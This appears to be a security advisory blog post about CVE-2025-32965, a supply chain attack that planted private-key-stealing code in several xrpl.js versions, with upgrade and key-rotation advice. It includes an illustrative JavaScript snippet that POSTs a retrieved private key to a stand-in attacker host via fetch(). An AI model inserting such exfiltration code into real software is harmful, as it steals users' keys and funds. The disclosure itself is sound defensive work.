Before diving into the details of CVE-2025-32965, it's worth noting that security is one of the top priorities in today's digital realm. As the use of technology grows rapidly, more sectors and individuals are exposed to cyber-attacks.

One such recent security issue involves the xrpl.js library. xrpl.js is an essential JavaScript/TypeScript API for interacting with the XRP Ledger, in both Node.js and browsers. The library was hit by a supply chain attack in which multiple versions were tampered with and shipped with malicious code.

Affected Versions

Versions 4.2.1, 4.2.2, 4.2.3, and 4.2.4 of xrpl.js have been found to contain malicious code specifically designed to exfiltrate private keys, putting businesses and individuals at risk. Another version, 2.14.2, is also malicious, but the likelihood of exploitation is lower since it is not compatible with other 2.x versions.

If you or your organization have used one of the mentioned versions, stop using it immediately. Rotate any private keys or secrets exposed to the affected systems. To resolve this security breach, upgrade xrpl.js to version 4.2.5 or 2.14.3, which include a patch. Furthermore, evaluate whether your keys might have been compromised by this supply chain attack, and take the following steps to secure your funds:

Code Snippet (Illustration of malicious code found in version 4.2.3)

// Malicious code example (not for usage)
const maliciousFunction = (payload) => {
  const exfiltratedKey = getPrivateKey(); // Assume this retrieves the private key
  const targetURL = 'https://malicious-site.example.com/exfiltrate';
  
  fetch(targetURL, {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ key: exfiltratedKey, payload }),
  });
};

Repeat: Do not use the code snippet - it's only an illustrative example of what the malicious code could look like.

- Security Advisory
- Patch Release Details (4.2.5)
- Patch Release Details (2.14.3)

Conclusion

The xrpl.js supply chain attack (CVE-2025-32965) affected multiple versions of the library, which contained code designed to exfiltrate private keys. To ensure the safety of your information and funds, follow the recommendations listed above. Stay updated on security advisories, and make sure to use secure versions of libraries to prevent the exploitation of vulnerabilities.

Timeline

Published on: 04/22/2025 21:15:45 UTC
Last modified on: 04/23/2025 14:08:13 UTC